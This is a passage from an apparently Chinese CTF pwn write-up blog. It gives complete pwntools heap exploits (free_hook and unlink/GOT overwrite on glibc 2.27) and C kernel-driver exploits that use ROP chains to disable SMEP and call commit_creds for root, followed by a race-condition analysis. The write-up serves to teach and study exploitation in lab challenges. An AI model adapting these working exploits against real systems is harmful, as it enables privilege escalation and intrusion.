class="number">0x7f6e5ea01410</span> - <span class="number">0x7f6e5e9ac000</span>)</span><br><span class="line">free(<span class="number">0</span>)</span><br><span class="line">free(<span class="number">3</span>)</span><br><span class="line">add(<span class="number">0x200</span>,<span class="string">&#x27;a&#x27;</span>*<span class="number">0xf8</span>+p64(<span class="number">0x101</span>)+p64(free_hook))</span><br><span class="line">add(<span class="number">0xf0</span>,<span class="string">&#x27;/bin/sh\x00&#x27;</span>)</span><br><span class="line">add(<span class="number">0xf0</span>,p64(system))</span><br><span class="line">free(<span class="number">3</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(libc_base))</span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h3 id="BlackHat-MEA-CTF-Qualification-2022"><a href="#BlackHat-MEA-CTF-Qualification-2022" class="headerlink" title="BlackHat MEA CTF Qualification 2022"></a>BlackHat MEA CTF Qualification 2022</h3><h5 id="版本：glibc-2-27-2"><a href="#版本：glibc-2-27-2" class="headerlink" title="版本：glibc-2.27"></a>版本：glibc-2.27</h5><h5 id="漏洞：UAF-3"><a href="#漏洞：UAF-3" class="headerlink" title="漏洞：UAF"></a>漏洞：UAF</h5><h5 id="考点：unlink"><a href="#考点：unlink" class="headerlink" title="考点：unlink"></a>考点：unlink</h5><h5 id="菜单：add、edit、delete"><a href="#菜单：add、edit、delete" class="headerlink" title="菜单：add、edit、delete"></a>菜单：add、edit、delete</h5><h5 id="限制：申请的堆要大于0x100，最多五个堆指针，只有calloc"><a href="#限制：申请的堆要大于0x100，最多五个堆指针，只有calloc" class="headerlink" title="限制：申请的堆要大于0x100，最多五个堆指针，只有calloc"></a>限制：申请的堆要大于0x100，最多五个堆指针，只有calloc</h5><h5 id="保护：没开pie，got表可改"><a href="#保护：没开pie，got表可改" class="headerlink" title="保护：没开pie，got表可改"></a>保护：没开pie，got表可改</h5><p>这题在add时会在bss段上保存三个东西：堆指针、申请的size、一个标志用来检测是否被delete过。</p>
<p>在edit时会根据对应位置是否有堆指针来决定能否edit，但在delete和add时会根据标志位来决定是否delete那个指针/在那个地址上add，简单点说就是不改变标志位的情况下一个堆指针最多被free一次，且可以被后面add的指针盖掉。</p>
<p><strong>其实看到PIE没关和got表可改时最先想到的应该是unlink</strong>，也就是先想到这题没开的保护会导致什么攻击方法可以被使用，而不是看到calloc就先往tcache stashing unlink attack这边靠，而且tcache stashing unlink attack应用的一般都是较高版本的libc</p>
<p>因为这题可以把chunk放到unsorted bin，且有个UAF，所以可以直接构造堆重叠（把大chunk放到unsorted bin，然后从里面割走几个小chunk），然后edit大chunk来在小chunk中构造unlink，后面的就很简单了。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line">p = process(<span class="string">&quot;./main&quot;</span>)</span><br><span class="line">elf = ELF(<span class="string">&quot;./main&quot;</span>)</span><br><span class="line">libc = ELF(<span class="string">&quot;./libc-2.27.so&quot;</span>)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">size</span>):</span></span><br><span class="line">	p.sendlineafter(<span class="string">&quot;&gt;&quot;</span>,<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line">	p.sendlineafter(<span class="string">&quot;:&quot;</span>,<span class="built_in">str</span>(size))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">index,content</span>):</span></span><br><span class="line">	p.sendlineafter(<span class="string">&quot;&gt;&quot;</span>,<span class="string">&#x27;2&#x27;</span>)</span><br><span class="line">	p.sendlineafter(<span class="string">&quot;:&quot;</span>,<span class="built_in">str</span>(index))</span><br><span class="line">	p.sendafter(<span class="string">&quot;:&quot;</span>,content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>(<span class="params">index</span>):</span></span><br><span class="line">	p.sendlineafter(<span class="string">&quot;&gt;&quot;</span>,<span class="string">&#x27;3&#x27;</span>)</span><br><span class="line">	p.sendlineafter(<span class="string">&quot;:&quot;</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line">check = <span class="number">0x4040E0</span></span><br><span class="line">heap = <span class="number">0x0404100</span></span><br><span class="line">size = <span class="number">0x04040C0</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">7</span>):</span><br><span class="line">	add(<span class="number">0x200</span>)</span><br><span class="line">	free(<span class="number">0</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">7</span>):</span><br><span class="line">	add(<span class="number">0x300</span>)</span><br><span class="line">	free(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">ptr = <span class="number">0x404100</span></span><br><span class="line">add(<span class="number">0x1f0</span>) <span class="comment">#0</span></span><br><span class="line">add(<span class="number">0x1f0</span>) <span class="comment">#1</span></span><br><span class="line">add(<span class="number">0x1f0</span>) <span class="comment">#2</span></span><br><span class="line">add(<span class="number">0x600</span>) <span class="comment">#3</span></span><br><span class="line">add(<span class="number">0x500</span>) <span class="comment">#padding</span></span><br><span class="line"></span><br><span class="line">free(<span class="number">0</span>)</span><br><span class="line">free(<span class="number">1</span>)</span><br><span class="line">free(<span class="number">2</span>)</span><br><span class="line">free(<span class="number">3</span>)</span><br><span class="line">add(<span class="number">0x200</span>) <span class="comment">#0</span></span><br><span class="line">add(<span class="number">0x300</span>) <span class="comment">#1</span></span><br><span class="line">payload = p64(<span class="number">0</span>) + p64(<span class="number">0x200</span>) + p64(ptr-<span class="number">0x18</span>+<span class="number">0x18</span>) + p64(ptr-<span class="number">0x10</span>+<span class="number">0x18</span>)</span><br><span class="line">payload = payload.ljust(<span class="number">0x200</span>,<span class="string">&#x27;\x00&#x27;</span>)</span><br><span class="line">payload += p64(<span class="number">0x200</span>) + p64(<span class="number">0x310</span>)</span><br><span class="line">edit(<span class="number">3</span>,payload)</span><br><span class="line">free(<span class="number">1</span>) <span class="comment">#unlink</span></span><br><span class="line"></span><br><span class="line">edit(<span class="number">3</span>,p64(elf.got[<span class="string">&#x27;free&#x27;</span>])*<span class="number">3</span> + p64(elf.got[<span class="string">&#x27;atoi&#x27;</span>])*<span class="number">2</span>)</span><br><span class="line">edit(<span class="number">0</span>,p64(<span class="number">0x04010D0</span>))</span><br><span class="line">free(<span class="number">4</span>)</span><br><span class="line">p.recv(<span class="number">1</span>)</span><br><span class="line">libc_base = u64(p.recvuntil(<span class="string">&quot;\n&quot;</span>,drop = <span class="literal">True</span>).ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>)) - (<span class="number">0x7f433cfa4680</span> - <span class="number">0x00007f433cf64000</span>)</span><br><span class="line">system = libc_base + (<span class="number">0x7f433cfb3440</span> - <span class="number">0x00007f433cf64000</span>)</span><br><span class="line">add(<span class="number">0x200</span>)</span><br><span class="line">edit(<span class="number">0</span>,p64(system))</span><br><span class="line">edit(<span class="number">1</span>,<span class="string">&#x27;/bin/sh\x00&#x27;</span>)</span><br><span class="line">free(<span class="number">1</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(libc_base))</span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h1 id="kernel"><a href="#kernel" class="headerlink" title="kernel"></a>kernel</h1><h3 id="入门题level1"><a href="#入门题level1" class="headerlink" title="入门题level1"></a>入门题level1</h3><p><strong>保护</strong>：无</p>
<p><strong>驱动</strong>：<code>copy_from_user</code>，栈溢出</p>
<p>最简单的入门</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/stat.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/types.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/ioctl.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">size_t</span> user_cs, user_ss, user_rflags, user_sp;</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">save_status</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	__asm__(<span class="string">&quot;mov user_cs, cs;&quot;</span></span><br><span class="line">	    <span class="string">&quot;mov user_ss, ss;&quot;</span></span><br><span class="line">	    <span class="string">&quot;mov user_sp, rsp;&quot;</span></span><br><span class="line">	    <span class="string">&quot;pushf;&quot;</span></span><br><span class="line">	    <span class="string">&quot;pop user_rflags;&quot;</span></span><br><span class="line">	    );</span><br><span class="line">	<span class="built_in">puts</span>(<span class="string">&quot;[*]status has been saved.&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">shell</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	system(<span class="string">&quot;/bin/sh&quot;</span>);</span><br><span class="line">	<span class="keyword">return</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">size_t</span> commit_creds = <span class="number">0xffffffff810b99d0</span>,prepare_kernel_cred = <span class="number">0xffffffff810b9d80</span>;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	save_status();</span><br><span class="line">	<span class="keyword">int</span> fd = open(<span class="string">&quot;/dev/baby&quot;</span>,<span class="number">0</span>);</span><br><span class="line">	<span class="keyword">if</span> (!fd)</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">&quot;ERR&quot;</span>);</span><br><span class="line">		<span class="built_in">exit</span>(<span class="number">-1</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">size_t</span> rop[<span class="number">0x30</span>] = &#123;<span class="number">0</span>&#125;;</span><br><span class="line">	<span class="keyword">int</span> i = <span class="number">0x11</span>;</span><br><span class="line">	rop[i++] = <span class="number">0xffffffff8100631d</span>;<span class="comment">//pop_rdi</span></span><br><span class="line">	rop[i++] = <span class="number">0</span>;</span><br><span class="line">	rop[i++] = prepare_kernel_cred;</span><br><span class="line">	rop[i++] = <span class="number">0xffffffff810790a6</span>;<span class="comment">//xor esi, esi; ret; </span></span><br><span class="line">	rop[i++] = <span class="number">0xffffffff814d6c3f</span>;<span class="comment">//mov rdi, rax; ja 0x6d6c2d; pop rbp; ret;</span></span><br><span class="line">	rop[i++] = <span class="number">0</span>;</span><br><span class="line">	rop[i++] = commit_creds;</span><br><span class="line">	rop[i++] = <span class="number">0xffffffff81070834</span>;<span class="comment">//swapgs; pop rbp; ret;</span></span><br><span class="line">	rop[i++] = <span class="number">0</span>;</span><br><span class="line">	rop[i++] = <span class="number">0xffffffff81036a5b</span>;<span class="comment">//iretq; pop rbp; ret;</span></span><br><span class="line">	rop[i++] = (<span class="keyword">size_t</span>)shell;</span><br><span class="line">	rop[i++] = user_cs;</span><br><span class="line">	rop[i++] = user_rflags;</span><br><span class="line">	rop[i++] = user_sp;</span><br><span class="line">	rop[i++] = user_ss;</span><br><span class="line">	getchar();</span><br><span class="line">	ioctl(fd,<span class="number">0x6001</span>,rop);	</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="入门题level2"><a href="#入门题level2" class="headerlink" title="入门题level2"></a>入门题level2</h3><p><strong>保护</strong>：开了kaslr、smep、smap、canary</p>
<p><strong>驱动</strong>：<code>copy_to_user</code>、<code>copy_from_user</code>，前者用来泄漏canary和kernel地址，后者触发栈溢出。</p>
<p><strong>思路</strong>：常规的泄漏地址和栈溢出，因为开了smep所以需要修改<code>cr4</code>寄存器（第20位为1说明开了smep），一般用如下rop链来改cr4</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">pop rdi;ret;</span><br><span class="line">0x6f0</span><br><span class="line">mov cr4,rdi;</span><br></pre></td></tr></table></figure>

<p>做这题时找不到<code>mov rdi, rax;ret;</code>这样的gadget，所以换了个别扭一点的，看到别的poc直接写函数指针来调用<code>commit_creds(prepare_kernel_cred(0))</code>，这种方法应该更好，省去了找一些gadget的时间。</p>
<p><strong>此外</strong>：做这题时发现断不了函数名（还不知道为什么），这时可以把kaslr关了，直接用地址来断：</p>
<ol>
<li><p>找驱动基址：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">/ # lsmod</span><br><span class="line">baby 16384 0 - Live 0xffffffffc0002000 (POE)</span><br></pre></td></tr></table></figure></li>
<li><p>在ida里设置基址：<code>edit-&gt;segments-&gt;rebase program</code>（或者打断点时直接自己加偏移）</p>
</li>
</ol>
<p>然后就可以断地址调试了;</p>
<ol>
<li>gdb打好断点之后remote上去，直接c</li>
<li>驱动里运行poc即可</li>
</ol>
<p>poc</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/stat.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/types.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/ioctl.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">size_t</span> user_cs, user_ss, user_rflags, user_sp;</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">save_status</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	__asm__(<span class="string">&quot;mov user_cs, cs;&quot;</span></span><br><span class="line">	    <span class="string">&quot;mov user_ss, ss;&quot;</span></span><br><span class="line">	    <span class="string">&quot;mov user_sp, rsp;&quot;</span></span><br><span class="line">	    <span class="string">&quot;pushf;&quot;</span></span><br><span class="line">	    <span class="string">&quot;pop user_rflags;&quot;</span></span><br><span class="line">	    );</span><br><span class="line">	<span class="built_in">puts</span>(<span class="string">&quot;[*]status has been saved.&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">shell</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	system(<span class="string">&quot;/bin/sh&quot;</span>);</span><br><span class="line">	<span class="keyword">return</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">//0xffffffff814d6c3f: mov rdi, rax; ja 0x6d6c2d; pop rbp; ret; </span></span><br><span class="line"><span class="comment">//0xffffffff810790a6: xor esi, esi; ret; </span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	save_status();</span><br><span class="line">	<span class="keyword">int</span> fd = open(<span class="string">&quot;/dev/baby&quot;</span>,<span class="number">0</span>);</span><br><span class="line">	<span class="keyword">size_t</span> buf[<span class="number">0x200</span>] = &#123;<span class="number">0</span>&#125;;</span><br><span class="line">	ioctl(fd,<span class="number">0x6002</span>,buf);</span><br><span class="line">	<span class="keyword">size_t</span> offset = buf[<span class="number">18</span>]<span class="number">-0x2b8cc8</span><span class="number">-0xffffffff81000000</span>;</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">&quot;kernel_addr = %llx,canary = %llx,and ASLR offset = %llx&quot;</span>,buf[<span class="number">18</span>],buf[<span class="number">13</span>],offset);</span><br><span class="line">	<span class="keyword">size_t</span> prepare_kernel_cred = <span class="number">0xffffffff810b9d80</span>+offset,commit_creds = <span class="number">0xffffffff810b99d0</span> + offset;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">size_t</span> rop[<span class="number">0x30</span>] = &#123;<span class="number">0</span>&#125;;</span><br><span class="line">	<span class="keyword">int</span> i = <span class="number">0x10</span>;</span><br><span class="line">	rop[i++] = buf[<span class="number">13</span>];</span><br><span class="line">	rop[i++] = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">	rop[i++] = <span class="number">0xffffffff8100631d</span>+offset;<span class="comment">//pop rdi; ret;</span></span><br><span class="line">	rop[i++] = <span class="number">0</span>;</span><br><span class="line">	rop[i++] = prepare_kernel_cred;</span><br><span class="line">	rop[i++] = <span class="number">0xffffffff810790a6</span>+offset;<span class="comment">//xor esi, esi; ret; </span></span><br><span class="line">	rop[i++] = <span class="number">0xffffffff814d6c3f</span>+offset;<span class="comment">//mov rdi, rax; ja 0x6d6c2d; pop rbp; ret; </span></span><br><span class="line">	rop[i++] = <span class="number">0</span>;</span><br><span class="line">	rop[i++] = commit_creds;</span><br><span class="line"></span><br><span class="line">	rop[i++] = <span class="number">0xffffffff8100631d</span>+offset;<span class="comment">//pop rdi; ret;</span></span><br><span class="line">	rop[i++] = <span class="number">0x6f0</span>;</span><br><span class="line">	rop[i++] = <span class="number">0xffffffff81020300</span>+offset;<span class="comment">//mov cr4, rdi; pop rbp; ret;</span></span><br><span class="line">	rop[i++] = <span class="number">0</span>;</span><br><span class="line">	rop[i++] = <span class="number">0xffffffff81070834</span>+offset;<span class="comment">//swapgs; pop rbp; ret;</span></span><br><span class="line">	rop[i++] = <span class="number">0</span>;</span><br><span class="line">	rop[i++] = <span class="number">0xffffffff81036a5b</span>+offset;<span class="comment">//iretq; pop rbp; ret;</span></span><br><span class="line"></span><br><span class="line">	rop[i++] = (<span class="keyword">size_t</span>)shell;</span><br><span class="line">	rop[i++] = user_cs;</span><br><span class="line">	rop[i++] = user_rflags;</span><br><span class="line">	rop[i++] = user_sp;</span><br><span class="line">	rop[i++] = user_ss;</span><br><span class="line">	getchar();</span><br><span class="line">	ioctl(fd,<span class="number">0x6001</span>,rop);</span><br><span class="line">	</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="入门题level3"><a href="#入门题level3" class="headerlink" title="入门题level3"></a>入门题level3</h3><p>通过ioctl调用下面这个函数，</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">__int64 __fastcall <span class="title">sub_25</span><span class="params">(__int64 a1, <span class="keyword">int</span> a2, __int64 a3)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">int</span> i; <span class="comment">// [rsp+1Ch] [rbp-54h]</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> ( a2 == <span class="number">0x6666</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    printk(<span class="string">&quot;Your flag is at %px! But I don&#x27;t think you know it&#x27;s content\n&quot;</span>, flag);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0LL</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span> <span class="keyword">if</span> ( a2 == <span class="number">0x1337</span></span><br><span class="line">         &amp;&amp; !_chk_range_not_ok(a3, <span class="number">0x10</span>LL, *(_QWORD *)(__readgsqword((<span class="keyword">unsigned</span> <span class="keyword">int</span>)&amp;current_task) + <span class="number">0x1358</span>))</span><br><span class="line">         &amp;&amp; !_chk_range_not_ok(</span><br><span class="line">               *(_QWORD *)a3,</span><br><span class="line">               *(<span class="keyword">int</span> *)(a3 + <span class="number">8</span>),</span><br><span class="line">               *(_QWORD *)(__readgsqword((<span class="keyword">unsigned</span> <span class="keyword">int</span>)&amp;current_task) + <span class="number">0x1358</span>))</span><br><span class="line">         &amp;&amp; *(_DWORD *)(a3 + <span class="number">8</span>) == <span class="built_in">strlen</span>(flag) )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">for</span> ( i = <span class="number">0</span>; i &lt; <span class="built_in">strlen</span>(flag); ++i )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">if</span> ( *(_BYTE *)(*(_QWORD *)a3 + i) != flag[i] )</span><br><span class="line">        <span class="keyword">return</span> <span class="number">22LL</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    printk(<span class="string">&quot;Looks like the flag is not a secret anymore. So here is it %s\n&quot;</span>, flag);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0LL</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="number">14LL</span>;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>其中调用了<code>_chk_range_not_ok</code>函数如下</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">bool</span> __fastcall _chk_range_not_ok(__int64 a1, __int64 a2, <span class="keyword">unsigned</span> __int64 a3)</span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">bool</span> v3; <span class="comment">// cf</span></span><br><span class="line">  <span class="keyword">unsigned</span> __int64 v4; <span class="comment">// rdi</span></span><br><span class="line"></span><br><span class="line">  v3 = __CFADD__(a2, a1);</span><br><span class="line">  v4 = a2 + a1;</span><br><span class="line">  <span class="keyword">return</span> v3 || a3 &lt; v4;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>主函数就是当ioctl的操作数为0x6666时输出flag的地址</p>
<p>0x1337很明显是用来比较flag的，从这一块for循环可以看出<code>*a3</code>就是flag的指针，0x7ffffffff000</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span> ( i = <span class="number">0</span>; i &lt; <span class="built_in">strlen</span>(flag); ++i )</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">if</span> ( *(_BYTE *)(*(_QWORD *)a3 + i) != flag[i] )</span><br><span class="line">    <span class="keyword">return</span> <span class="number">22LL</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>而从前面的判断中可以知道<code>*(_DWORD *)(a3 + 8)</code>是flag的长度（4个字节）</p>
<p>那么可知传入的a3应该类似结构体</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">suc</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">	<span class="keyword">char</span> *flag;</span><br><span class="line">    <span class="keyword">int</span> len;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<p>这题的条件竞争原理是线程1通过了前面的check（传进去的指针指向用户态），线程2把指针改成指向内核空间的flag。</p>
